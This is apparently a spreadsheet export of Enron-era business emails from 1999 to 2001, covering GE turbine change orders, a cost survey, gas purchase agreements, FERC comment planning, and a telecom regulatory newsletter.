---------------------- Forwarded by Kay Mann/Corp/Enron on 10/16/2000 06:35 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Shoemaker, Kent (GEAE)" &lt;kent.shoemaker@ae.ge.com&gt; on 10/16/2000 09:48:01 AM_x000D_
To: "Johnson, Lee L (PS, SSEP)" &lt;lee.johnson@ss.ps.ge.com&gt;, _x000D_
"'kay.mann@enron.com'" &lt;kay.mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: Revised letter of Sept 29_x000D_
_x000D_
_x000D_
I believe that this is the most recent version.  Lee, check the dates to make_x000D_
sure they are right._x000D_
_x000D_
Kent_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Johnson, Lee L (PS, SSEP)_x000D_
Sent: Monday, October 16, 2000 10:17 AM_x000D_
To: Shoemaker, Kent_x000D_
Subject: FW: Revised letter of Sept 29_x000D_
_x000D_
_x000D_
_x000D_
Kent,_x000D_
_x000D_
Please send Kay the Amendment #4 draft (shedule change for Units 19,20,23,24)._x000D_
I think you had it last.  I can't seem to find it either._x000D_
_x000D_
Lee_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Friday, October 13, 2000 2:58 PM_x000D_
To: lee.johnson@ss.ps.ge.com_x000D_
Cc: michael.storm@ss.ps.ge.com; kent.shoemaker@ae.ge.com;_x000D_
ben.f.jacoby@enron.com; chris.booth@enron.com; Kathleen.Clark@enron.com_x000D_
Subject: Re: Revised letter of Sept 29_x000D_
_x000D_
_x000D_
_x000D_
Lee,_x000D_
_x000D_
Your changes to the letter look fine to me._x000D_
_x000D_
I'm attaching the latest version I have on change order #2.  Are we ready_x000D_
to go with this one?_x000D_
_x000D_
(See attached file: changeorder#2rev7.doc)_x000D_
_x000D_
We would like to close out #3 and #4 soon.  I believe GE prepared #4._x000D_
Could you send me a copy of the latest draft of #4, as it was inadvertently_x000D_
deleted from my computer. Meanwhile, I'll work to get you a draft of #3._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
lee.johnson@ss.ps.ge.com on 10/13/2000 08:03:49 AM_x000D_
_x000D_
To:   kay.mann@enron.com_x000D_
cc:   michael.storm@ss.ps.ge.com, kent.shoemaker@ae.ge.com,_x000D_
      ben.f.jacoby@enron.com, chris.booth@enron.com_x000D_
_x000D_
Subject:  Revised letter of Sept 29_x000D_
_x000D_
_x000D_
 &lt;&lt;SSlttrsept29rev1.doc&gt;&gt;  &lt;&lt;SSlttrsept29rev2.doc&gt;&gt;_x000D_
_x000D_
Kay,_x000D_
_x000D_
Attached is a redline version of Sept 29 letter, and clean copy for_x000D_
sign/send.  The change involves reference to the contract paragraphs that_x000D_
deal with corrections, enabling Enron and GE to reach agreement on timing_x000D_
of_x000D_
performance of corrective work, if we both agreed to a schedule other than_x000D_
prior to delivery to site.  We recognize that if any of this work has an_x000D_
impact on your EPC contractor's site work schedule, there maybe other_x000D_
consequences/remedies, as provided in the contract._x000D_
_x000D_
I'll sign and fax.  Hope you all have no objections._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Lee_x000D_
_x000D_
_x000D_
_x000D_
(See attached file: SSlttrsept29rev1.doc)_x000D_
(See attached file: SSlttrsept29rev2.doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Change Order #4.doc_x000D_
</t>
  </si>
  <si>
    <t>Thu, 3 Aug 2000 08:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kathryn.cordes@enron.com', 'dorothy.ricketts@enron.com', 'faye.ellis@enron.com', 'cheryl.dudley@enron.com', 'juanita.marchand@enron.com', 'daren.farmer@enron.com', 'judy.barnes@enron.com', 'david.maxwell@enron.com', 'linda.bryan@enron.com', 'mary.gosnell@enron.com', 'gordon.heaney@enron.com', 'kim.theriot@enron.com', 'connie.sutton@enron.com', 'lisa.csikos@enron.com', 'donna.greif@enron.com', 'dale.neuner@enron.com', 'carrie.hollomon@enron.com', 'rita.wynne@enron.com', 'bryce.baxter@enron.com', 'dan.houston@enron.com', 'bob.klein@enron.com', 'pat.clynes@enron.com', 'bill.hare@enron.com', 'irene.flynn@enron.com', 'michael.eiben@enron.com', 'michael.moscoso@enron.com'})</t>
  </si>
  <si>
    <t>July Activity Driver Survey</t>
  </si>
  <si>
    <t xml:space="preserve">We are in the midst of enhancing the Operations Pricing Model (fka _x000D_
Transaction Costing Model) and as a result the following applies:_x000D_
_x000D_
 - Do not need the hours surveys completed for July or August_x000D_
 - Need the activity driver surveys completed for July and August_x000D_
 _x000D_
Attached is the activity driver survey for the month of July.   Please fill _x000D_
out the attached activity driver survey with July numbers for your RC and _x000D_
return to Shari Mao by end of day Friday, August 11._x000D_
_x000D_
During the enhancment period (July and August) we will be standardizing and _x000D_
consolidating activities across all commodities and operational functions.  _x000D_
This will result in a shorter survey and easier time assignment to activities _x000D_
for your teams.  The shorter and easier surveying process will begin with the _x000D_
September survey._x000D_
_x000D_
Please call either me or Shari Mao at 39641 or 33859, respectively for any _x000D_
clarification.  Thanks for your patience and help,_x000D_
_x000D_
James Scribner_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Nov 2001 13:09:25 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: San Jaun Purchase Agreements</t>
  </si>
  <si>
    <t>We will but choose the words you use very carefully with regards to what those may be.... LC's, cash are difficult. Basically the most that they are ever exposed to us for is 55 days of gas... and very little mark to market valuations. _x000D_
_x000D_
Thanks, BT _x000D_
_x000D_
-----Original Message-----_x000D_
From: Whitt, Mark _x000D_
Sent: Tuesday, November 06, 2001 3:00 PM_x000D_
To: Lucci, Paul T.; Tycholiz, Barry_x000D_
Subject: FW: San Jaun Purchase Agreements_x000D_
_x000D_
_x000D_
FYI.  I told them we will address any credit concerns they may have._x000D_
_x000D_
-----Original Message-----_x000D_
From: Brian Stone [mailto:htebs@huber.com]_x000D_
Sent: Tuesday, November 06, 2001 1:38 PM_x000D_
To: Whitt, Mark_x000D_
Subject: Re: San Jaun Purchase Agreements_x000D_
_x000D_
_x000D_
Mark,_x000D_
I am going to be out of the office Wednesday and Thursday...please_x000D_
coordinate with Jason the release procedures...I am traveling with David_x000D_
Pruner, an we will discuss an review the latest proposal...I will have_x000D_
comments for you Friday or Monday._x000D_
brian_x000D_
_x000D_
&gt;&gt;&gt; "Whitt, Mark" &lt;Mark.Whitt@enron.com&gt; 11/05/01 11:26AM &gt;&gt;&gt;_x000D_
I have changed the dates and prices in these agreements, but those_x000D_
should be the only changes necessary.  Let me know if either of you_x000D_
see_x000D_
any other changes that are necessary._x000D_
_x000D_
Brian, let's get together this afternoon and see if we can organize_x000D_
our_x000D_
other capacity release transactions that need to be completed by_x000D_
December 1.  Does 3:00 your time work?_x000D_
_x000D_
 &lt;&lt;Huber Capacity Release(El Paso) final.doc&gt;&gt;  &lt;&lt;JM Huber Confirm_x000D_
(Cal)Transport final.doc&gt;&gt;  &lt;&lt;JM Huber Confirm (Cal)W-O final.doc&gt;&gt; _x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
This e-mail is the property of Enron Corp. and/or its relevant_x000D_
affiliate and may contain confidential and privileged material for the_x000D_
sole use of the intended recipient (s). Any review, use, distribution or_x000D_
disclosure by others is strictly prohibited. If you are not the intended_x000D_
recipient (or authorized to receive for the recipient), please contact_x000D_
the sender or reply to Enron Corp. at_x000D_
enron.messaging.administration@enron.com and delete all copies of the_x000D_
message. This e-mail (and any attachments hereto) are not intended to be_x000D_
an offer (or an acceptance) and do not create or evidence a binding and_x000D_
enforceable contract between Enron Corp. (or any of its affiliates) and_x000D_
the intended recipient or any other party, and may not be relied on by_x000D_
anyone as the basis of a contract by estoppel or otherwise. Thank you. _x000D_
**********************************************************************</t>
  </si>
  <si>
    <t>Sun, 12 Nov 2000 23:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Comments on FERC November 1 order</t>
  </si>
  <si>
    <t xml:space="preserve">There are a few other issues we need to look into:_x000D_
_x000D_
Larcamp told Hartsoe and I after the meeting that FERC may clarify that the _x000D_
price caps and reporting obligations apply only to bids into the PX and ISO _x000D_
-- ie no bilateral transaction will be subject to the requirements.  He asked _x000D_
if knowing this would change any of our views (esp peaking plants, though I _x000D_
suspect it's already too late for that).  My gut reaction is that so long as _x000D_
the market continues to clear through the centralized exchanges this _x000D_
"exemption" for bilateral transactions won't matter much, but let's think it _x000D_
through.  Is EOL or APX an alternative?_x000D_
Massey specifically asked us to address forward markets in our comments.  _x000D_
Specifically, "has FERC done everything it can to encourage forward market _x000D_
development?"  In addition to any other points we might make, I think we _x000D_
should argue that "PJMing" the market won't facilitate and may even hinder _x000D_
forward market development.  Also, we should advocate actions by FERC that _x000D_
take away second-guessing by the CPUC in order to reduce utility fears about _x000D_
contracting forward._x000D_
We have to give the Commission a way out on price caps.  We need to think _x000D_
through whether there is something we can live with here, or we should take _x000D_
the approach I took in my testimony:  FERC should encourage the state to _x000D_
provide rate protection for selected customer classes by putting those _x000D_
requirements up for bid (ie get the utility out of the commodity business as _x000D_
much as possible)._x000D_
Finally, on governence issues we should argue for a narrowe role for the ISO _x000D_
as a way of diffusing the emotional governence debate.  Analogy:  if the ISO _x000D_
is simply the air traffic controller all parties will simply be interested in _x000D_
retaining the most technically competent people (not hiring or appointing _x000D_
their lackies or friends).  So long as the ISO has a role in setting prices, _x000D_
acquiring supplies or running the market, it is destined to be controversial _x000D_
and highly politicized.  Those functions should be left to the market._x000D_
_x000D_
_x000D_
_x000D_
	Mary Hain@ECT_x000D_
	11/10/2000 11:13 AM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron, Harry Kingerski/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Comments on FERC November 1 order_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Mary Hain/HOU/ECT on 11/10/2000 09:20 AM _x000D_
---------------------------_x000D_
_________________________x000D_
_x000D_
_x000D_
To: Christian Yoder/HOU/ECT@ECT, steve.c.hall@enron.com, Richard Sanders, _x000D_
Susan J Mara/SFO/EES@EES, Mona L Petrochko/NA/Enron@Enron, _x000D_
jdasovic@ees.enron.com, Paul Kaufman/PDX/ECT@ECT, James D _x000D_
Steffes/NA/Enron@Enron, Joe Hartsoe@Enron, Sarah Novosel/Corp/Enron@ENRON, _x000D_
James E Keller/HOU/EES@EES, Mike D Smith/HOU/EES@EES, Harry _x000D_
Kingerski/HOU/EES@EES, Dennis Benevides, Tim Belden/HOU/ECT@ECT, Robert _x000D_
Badeer/HOU/ECT@ECT, Jeff Richter/HOU/ECT@ECT, Alan Comnes/PDX/ECT@ECT, Steve _x000D_
Kean, Richard Shapiro, Tim Heizenrader/PDX/ECT@ECT_x000D_
cc: carrrn@bracepatt.com, dwatkiss@bracepatt.com_x000D_
From: Mary Hain/HOU/ECT_x000D_
Date: 11/09/2000 05:19:03 PM_x000D_
Subject: Comments on FERC November 1 order_x000D_
_x000D_
For purposes of our discussions, Alan and I have put together an outline of _x000D_
issues raised in the FERC meeting today that we might consider putting in our _x000D_
comments to FERC.  Our written comments would also include the issues we have _x000D_
already raised in our white paper and our oral comments at FERC.  Of course _x000D_
to the extent we have discussed things in our white paper we could simply _x000D_
cite the paper.  Given the potentially long list of issues to be addressed, I _x000D_
haved left a voice mail asking Seabron if he is available to help Alan._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 05:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'postmaster@mailsrv2.arpartners.com'})</t>
  </si>
  <si>
    <t>Auto Reply to your message ...</t>
  </si>
  <si>
    <t>-----  The following text is an automated response to your message  -----_x000D_
Thanks for your message._x000D_
I will be on jury duty the week of Noveber 6 with limited access to email.  I _x000D_
will get back with you as soon as possible._x000D_
Thank you</t>
  </si>
  <si>
    <t>Wed, 13 Oct 1999 09:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Ambassador Li's request to meet Ken Lay in Houston on 10/21; use of_x000D_
 corporate jet for trip.</t>
  </si>
  <si>
    <t xml:space="preserve">Forwarded at the request of Joe Hillings:_x000D_
Please advise us . . ._x000D_
_x000D_
---------------------- Forwarded by Lora Sullivan/Corp/Enron on 10/13/99 _x000D_
05:09 PM ---------------------------_x000D_
_x000D_
Lora Sullivan_x000D_
10/13/99 04:58 PM_x000D_
_x000D_
_x000D_
To: Joe Hillings/Corp/Enron@Enron_x000D_
cc: Carolyn Cooney/Corp/Enron@ENRON, Lora Sullivan/Corp/Enron@Enron _x000D_
Subject: Ambassador Li's request to meet Ken Lay in Houston on 10/21; use of _x000D_
corporate jet for trip._x000D_
_x000D_
Mr. Huo Mingwa called 202-745-6554._x000D_
_x000D_
He is looking into the Ambassador's availability to fly to NYC to meet Ken _x000D_
Lay on October 19th but it doesn't look good._x000D_
_x000D_
He asked me what Ken Lay's schedule looks like after October 20 when he _x000D_
returns from travel.  Ambassador Li would like to know if the Enron corporate _x000D_
jet could take him to and from DC to meet with Ken Lay in Houston.  October _x000D_
21st in the morning or early afternoon look good for the Ambassador._x000D_
_x000D_
How do you want me to proceed?_x000D_
_x000D_
Lora_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 08:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>TRs State NewsWire - 06/06/01</t>
  </si>
  <si>
    <t xml:space="preserve">=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D_x000D_
_x000D_
TR's State NewsWire_x000D_
_x000D_
. . .daily intelligence on communications_x000D_
industry news and policy from the editors_x000D_
of Telecommunications Reports. . ._x000D_
_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D_x000D_
_x000D_
_x000D_
*Table of Contents*_x000D_
June 6, 2001_x000D_
_x000D_
STATES_x000D_
PENNSYLVANIA -- PUC conditionally supports Verizon interLATA bid_x000D_
CONNECTICUT -- SNET challenges city's telecom certification_x000D_
TENNESSEE -- BellSouth to ask TRA to support market-entry bid_x000D_
soon_x000D_
MICHIGAN -- PSC adopts '616' area code 'split'_x000D_
NEW YORK -- Nassau County restricts use of wireless phones_x000D_
WEST VIRGINIA -- Verizon to appeal $18M access-rate reduction_x000D_
CALIFORNIA -- Wood proposes 'anticramming' rules_x000D_
MISSOURI -- House passes rights-of-way bill_x000D_
GEORGIA -- WorldCom says FX calls subject to 'recip comp'_x000D_
CALIFORNIA -- ALJ suggests requiring Pacific Bell to permit_x000D_
intraLATA toll presubscription_x000D_
CALIFORNIA -- PUC extends deadline for Pacific Bell interLATA_x000D_
filing_x000D_
IOWA -- Board mulls revoking LTDS's certificate_x000D_
NEBRASKA -- PSC to discuss implementing '511'_x000D_
NEBRASKA -- PSC seeks copies of MDU contracts_x000D_
CONNECTICUT -- DPUC expands Lifeline assistance in tribal areas_x000D_
MICHIGAN -- Customers can bring complaints without counsel_x000D_
OREGON -- Group criticizes AT&amp;T price hike_x000D_
MINNESOTA -- MP Telecom upgrades network_x000D_
MASSACHUSETTS -- CTC activates Springfield fiber network_x000D_
GEORGIA -- AGL networks to install fiber in Atlanta_x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
PENNSYLVANIA -- PUC conditionally supports Verizon interLATA bid_x000D_
_x000D_
The Public Utility Commission today lent its support to Verizon_x000D_
Pennsylvania, Inc.'s application to provide in-region interLATA_x000D_
(local access and transport area) services, subject to several_x000D_
conditions to ensure market competition.  Today's decision_x000D_
concludes a formal investigation that began when Verizon_x000D_
requested the commission's support in January.  (1/9/01)_x000D_
_x000D_
In a 3-2 vote, the PUC told Verizon that it must agree to a_x000D_
permanent assurance plan with "self-executing" remedies based on_x000D_
the New York model already accepted by the FCC and to increased_x000D_
penalties for failure to meet performance standards.  Verizon_x000D_
said that it will accept these conditions and that it plans to_x000D_
file its interLATA bid with the FCC "shortly."_x000D_
_x000D_
Commissioners Nora Mead Brownell and Terrance J. Fitzpatrick_x000D_
dissented.  Commissioner Brownell said, "I cannot, in good_x000D_
conscience, affirm that these markets are open as envisioned_x000D_
under the [federal Telecommunications Act of 1996]."  Both_x000D_
dissenting commissioners listed several areas in which Verizon_x000D_
had failed to meet the FCC requirements to determine that local_x000D_
markets are open to competition._x000D_
_x000D_
A WorldCom, Inc., spokesman told TR, "We agree with the_x000D_
dissenters and hope the FCC will recognize that problems still_x000D_
exist and force Verizon to fix them prior to allowing them to_x000D_
offer long distance."_x000D_
_x000D_
Once Verizon files its market-entry bid with the FCC, the PUC_x000D_
will present its recommendation.  Section 271 of the Act requires_x000D_
the FCC to consult with the U.S. Department of Justice and_x000D_
relevant state regulators before ruling on such applications._x000D_
(Docket no. M-00001435, Consultative Report on Application of_x000D_
Verizon Pennsylvania Inc., for FCC Authorization to Provide In-_x000D_
Region, InterLATA Service in Pennsylvania)_x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
CONNECTICUT -- SNET challenges city's telecom certification_x000D_
_x000D_
Southern New England Telecommunications (SNET) has filed an_x000D_
appeal in Superior Court (New Britain) challenging the Department_x000D_
of Public Utility Control's decision to grant the city of Groton_x000D_
a certificate to provide telecom access services.  (Docket no._x000D_
00-03-12)_x000D_
_x000D_
SNET argues that Groton "is not legally empowered to offer_x000D_
telecommunications services to those who are not inhabitants of_x000D_
its electric service area" under Connecticut General Statutes =0F5_x000D_
7-233i.  Groton's customers as defined in its application would_x000D_
all be noninhabitants, SNET said._x000D_
_x000D_
In its April 11 decision, the DPUC agreed with Groton's argument_x000D_
that "[the statute] has no language prohibiting a municipality_x000D_
from offering wholesale telecommunications service."_x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
TENNESSEE -- BellSouth to ask TRA to support market-entry bid_x000D_
soon_x000D_
_x000D_
BellSouth Telecommunications, Inc., has notified the Regulatory_x000D_
Authority that it plans to request support for its bid to enter_x000D_
the Tennessee interLATA (local access and transport area) market_x000D_
"by the end of July."  Compliance with the 14-point "competitive_x000D_
checklist" of section 271 of the federal Telecommunications Act_x000D_
is a prerequisite for FCC authorization to provide in-region_x000D_
interLATA service.  The FCC must consult with the U.S. Department_x000D_
of Justice and relevant state regulators before ruling on the_x000D_
applications._x000D_
_x000D_
BellSouth asked the TRA to schedule hearings on its application_x000D_
for the first week of November.  BellSouth asked the TRA to_x000D_
support its section 271 bid in 1997, but the company withdrew the_x000D_
request before the TRA could decide whether to endorse it, a TRA_x000D_
staff member told TR._x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
MICHIGAN -- PSC adopts '616' area code 'split'_x000D_
_x000D_
The Public Service Commission yesterday approved a geographic_x000D_
"split" to relieve number exhaustion in the "616" area code._x000D_
_x000D_
A north/south geographic split will be implemented with a_x000D_
dividing line that follows the northern boundaries of Saugatuck,_x000D_
Hamilton, Hopkins, Wayland, Middleville, Hastings, and Woodland_x000D_
rate centers.  Customers in and to the south of these rate_x000D_
centers will receive a new area code.  Customers to the north of_x000D_
the rate centers will retain 616._x000D_
_x000D_
Permissive dialing will begin by July 13, 2002, and mandatory_x000D_
dialing will begin Feb. 15, 2003.  Wireless carriers will have an_x000D_
extended permissive dialing period through Feb. 15, 2004.  (Case_x000D_
no. U-12850)_x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
NEW YORK -- Nassau County restricts use of wireless phones_x000D_
_x000D_
Nassau County today enacted an ordinance requiring the use of_x000D_
hands-free devices when operating wireless phones while driving._x000D_
"Although mobile phones provide convenience for our busy lives,_x000D_
their use must conform with the need for public safety," Nassau_x000D_
County Executive Thomas Gulotta said._x000D_
_x000D_
Emergency calls to police, fire, ambulance, or health care_x000D_
providers are exempt from the requirement.  The ordinance_x000D_
authorizes the police department to fine up to $100 per_x000D_
violation, a Nassau County spokesperson told TR.  The ordinance_x000D_
takes effect July 1._x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
WEST VIRGINIA -- Verizon to appeal $18M access-rate reduction_x000D_
_x000D_
Verizon West Virginia, Inc., yesterday said it plans to ask the_x000D_
Public Service Commission to reconsider an order requiring_x000D_
Verizon to reduce its access rates by $18 million over three_x000D_
years.  The PSC's order addressed an AT&amp;T Corp. complaint.  While_x000D_
the reduction is smaller than the $27.6 million suggested by_x000D_
AT&amp;T, it's larger than the $6 million cut Verizon proposed._x000D_
_x000D_
Verizon said that, if given the chance, it would demonstrate that_x000D_
the PSC was "misguided in seeking to mirror in-state and_x000D_
interstate access rates."  The telco said the order gives AT&amp;T_x000D_
and other long distance companies a free ride on its network at_x000D_
the expense of consumers._x000D_
_x000D_
The PSC ordered the access charge reductions to be passed through_x000D_
to West Virginia toll customers.  Verizon responded, "People_x000D_
shouldn't hold their breath waiting for AT&amp;T to pass along any_x000D_
savings."  (Case no. 00-0318-T-C, AT&amp;T Communications of West_x000D_
Virginia, Inc. v. Bell Atlantic-West Virginia, Inc.)_x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
CALIFORNIA -- Wood proposes 'anticramming' rules_x000D_
_x000D_
Public Utilities Commissioner Charles Wood has proposed rules to_x000D_
regulate the inclusion of noncommunications charges on phone_x000D_
bills.  Existing law, which authorizes only communications-_x000D_
related charges on phone bills, is scheduled to expire July 1._x000D_
(1/5/01)  The proposed rules are designed to prevent "cramming,"_x000D_
which is the placement of unauthorized charges on phone bills._x000D_
_x000D_
The proposed rules require telecom companies to obtain a_x000D_
customer's written consent before including noncommunications_x000D_
charges on phone bills.  Customers may revoke their consent at_x000D_
any time without charge and may identify a dollar maximum per_x000D_
charge and per billing cycle on noncommunications charges._x000D_
Telecom companies may not disconnect or threaten to disconnect_x000D_
basic local phone service for nonpayment of noncommunications_x000D_
charges._x000D_
_x000D_
Under the proposed rules, telecom companies must take_x000D_
"reasonable" precautions to screen vendors and billing agents_x000D_
before agreeing to provide noncommunications billing services for_x000D_
them.  Noncommunications charges must be identified in a separate_x000D_
section of phone bills.  Comments are due June 20.  (Rulemaking_x000D_
00-02-004)_x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
MISSOURI -- House passes rights-of-way bill_x000D_
_x000D_
The House has passed a bill restricting local governments'_x000D_
authority to regulate public rights-of-way.  The measure now goes_x000D_
to Gov. Bob Holden (D.).  Southwestern Bell Telephone Co. and_x000D_
competitive local exchange carriers support the bill, but the_x000D_
Missouri Municipal League "fought the bill tooth and nail," a_x000D_
league spokesperson told TR._x000D_
_x000D_
SB 369 would prohibit local governments from requiring telecom_x000D_
companies to obtain a franchise to use rights-of-way but would_x000D_
grandfather franchise agreements in effect May 1.  The bill would_x000D_
prohibit rights-of-way rental fees but would authorize local_x000D_
governments to impose rights-of-way permit fees, which would be_x000D_
limited to "actual, substantiated costs reasonably incurred" in_x000D_
managing the public rights-of-way._x000D_
_x000D_
Local governments would have to process rights-of-way permit_x000D_
applications within 31 days after receiving a complete_x000D_
application.  Telecom and cable TV companies would be authorized_x000D_
to identify rights-of-way permit fees on customer bills._x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
GEORGIA -- WorldCom says FX calls subject to 'recip comp'_x000D_
_x000D_
WorldCom, Inc., has asked the Public Service Commission to_x000D_
determine that calls originated by BellSouth Telecommunications,_x000D_
Inc.'s customers to competitive local exchange carriers' foreign-_x000D_
exchange (FX) customers should be considered local and therefore_x000D_
subject to reciprocal compensation.  Proper treatment of FX_x000D_
traffic is required to meet item 13 (reciprocal compensation) of_x000D_
section 271 of the federal Telecommunications Act of 1996's 14-_x000D_
point "competitive checklist," MCI said._x000D_
_x000D_
Treating CLECs' FX traffic as long distance provides "significant_x000D_
competitive advantages" to BellSouth because it permits BellSouth_x000D_
to assess access charges on local calls and "shields BellSouth's_x000D_
local FX service from competition," WorldCom said.  (Docket no._x000D_
6863-U)_x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
CALIFORNIA -- ALJ suggests requiring Pacific Bell to permit_x000D_
intraLATA toll presubscription_x000D_
_x000D_
Administrative Law Judge Karen Jones has recommended that the_x000D_
Public Utilities Commission require Pacific Bell to permit_x000D_
MCImetro Access Transmission Services LLC's customers to_x000D_
presubscribe to Pacific Bell's intraLATA (local access and_x000D_
transport area) long distance service.  The recommendation was_x000D_
made in a draft arbitrator's report about the companies'_x000D_
interconnection agreement._x000D_
_x000D_
Pacific Bell said the requirement would be confusing to customers_x000D_
and would require the company to identify a separate billing_x000D_
channel or generate a bill solely for intraLATA long distance_x000D_
service._x000D_
_x000D_
"It is blatantly discriminatory for Pacific to refuse to provide_x000D_
intraLATA toll service to MCI's local service customers," Ms._x000D_
Jones said.  She said, "Pacific's arguments of 'customer_x000D_
confusion' and 'billing' concerns do not have merit."  "Customers_x000D_
could receive three different bills for the three different_x000D_
services, and other carriers cope with billing for only one of_x000D_
those three services.  There is no reason that Pacific should not_x000D_
be able to provide a bill which includes only intraLATA_x000D_
services."  Comments on the draft arbitrator's report are due_x000D_
June 20.  (Application 01-01-010)_x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
CALIFORNIA -- PUC extends deadline for Pacific Bell interLATA_x000D_
filing_x000D_
_x000D_
Public Utilities Commissioner Geoffrey Brown has extended Pacific_x000D_
Bell's deadline for filing information demonstrating its_x000D_
compliance with the interLATA (local access and transport area)_x000D_
market-entry requirements of section 709.2 of California code._x000D_
The section requires the PUC to find that permitting Pacific Bell_x000D_
to enter the California interLATA market doesn't harm the long_x000D_
distance market substantially.  The commission also must find_x000D_
that Pacific Bell's entry is based on fully open local exchange_x000D_
access and that the company isn't engaging in anticompetitive_x000D_
behavior or improper cross-subsidization.  (5/7/01)_x000D_
_x000D_
Pacific Bell asked the PUC to extend the deadline from June 4_x000D_
until "mid-June," when the company plans to file its section 271_x000D_
application with the PUC.  Mr. Brown granted the company's_x000D_
request and said he would establish a comment filing schedule_x000D_
after Pacific has filed its section 709.2 assessment and section_x000D_
271 application.  (Rulemaking nos. 93-04-003 and 95-04-043 and_x000D_
Investigation nos. 93-04-002 and 95-04-044)_x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
IOWA -- Board mulls revoking LTDS's certificate_x000D_
_x000D_
The Utilities Board has ordered LTDS Corp. to demonstrate why its_x000D_
operating certificate shouldn't be revoked.  The board is_x000D_
concerned that "actions on the part of LTDS do not appear to be_x000D_
the actions of a bona fide competitive local exchange carrier."_x000D_
_x000D_
The board said there appears to be no voice traffic from or to an_x000D_
LTDS customer in any exchange other than Fairfield.  The company_x000D_
ordered and then cancelled orders for voice trunks in the Pella,_x000D_
Chariton, and Centerville exchanges.  It ordered trunks in the_x000D_
Grinnell and Sigourney exchanges, although it has no assigned_x000D_
"NXX" codes there.  The company's tariff also fails to include a_x000D_
residential rate.  It was deleted in a Jan. 19 tariff revision,_x000D_
the board said._x000D_
_x000D_
It said state law obligates each local exchange utility to serve_x000D_
all eligible customers within the utility's service territory,_x000D_
unless explicitly excepted from the requirement by the board._x000D_
(Iowa Code section 476.29(5))_x000D_
_x000D_
LTDS must file direct testimony by June 22.  Petitions to_x000D_
intervene are due July 3.  Additional comments from the consumer_x000D_
advocate and intervenors are due July 17.  Prepared rebuttal_x000D_
testimony from LTDS will be due Aug. 3.  A hearing is scheduled_x000D_
for Aug. 14.  (Docket no. TCU-01-13 - In Re: LTDS Corporation)_x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
NEBRASKA -- PSC to discuss implementing '511'_x000D_
_x000D_
The Public Service Commission has scheduled an Aug. 15 workshop_x000D_
to address implementation of the "511" dialing code as an_x000D_
Advanced Traveler Weather Information System (ATWIS).  It will_x000D_
provide route-specific weather forecasts and road condition_x000D_
reports to callers based on specific location information they_x000D_
provide._x000D_
_x000D_
The PSC approved implementation of 511 for the ATWIS May 23.  The_x000D_
commission directed the Department of Roads and the Nebraska_x000D_
State Patrol to begin deploying the ATWIS.  (Application no. C-_x000D_
2506/PI-48 - In the Matter of the Application of the Commission,_x000D_
on its own motion, to seek comment on the establishment and_x000D_
implementation of '511' as a statewide three-digit calling number_x000D_
reserved for access to ATWIS)_x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
NEBRASKA -- PSC seeks copies of MDU contracts_x000D_
_x000D_
The Public Service Commission has requested by June 15 copies of_x000D_
all contracts that all certified telecom carriers have entered_x000D_
into with multiple dwelling units (MDUs)._x000D_
_x000D_
In April 1999 the PSC issued an order clarifying its policy for_x000D_
residential MDU access.  Qwest Corp. appealed the PSC's order to_x000D_
the Nebraska Supreme Court, which affirmed a majority of it.  The_x000D_
court remanded to the PSC the issue of whether the rates it set_x000D_
for MDU access comply with the U.S. Court of Appeals for the_x000D_
Eighth Circuit's (St. Louis) decision in Iowa Utilities Board v._x000D_
FCC (120 F. 3d 753)._x000D_
_x000D_
After reviewing the case's testimony, the PSC said it's_x000D_
"disturbed" that some telecom carriers still may be utilizing_x000D_
contracts with MDUs that contain exclusive access and/or_x000D_
exclusive marketing provisions "in apparent blatant disregard of_x000D_
prior orders of this commission, as well as the FCC."  (Docket_x000D_
no. C-2534/PI-50 - The Commission, on its own motion, to examine_x000D_
the potential noncompliance with Commission orders entered in_x000D_
Docket no. C-1878/PI-23)_x000D_
_x000D_
_______________________________________________________x000D_
_x000D_
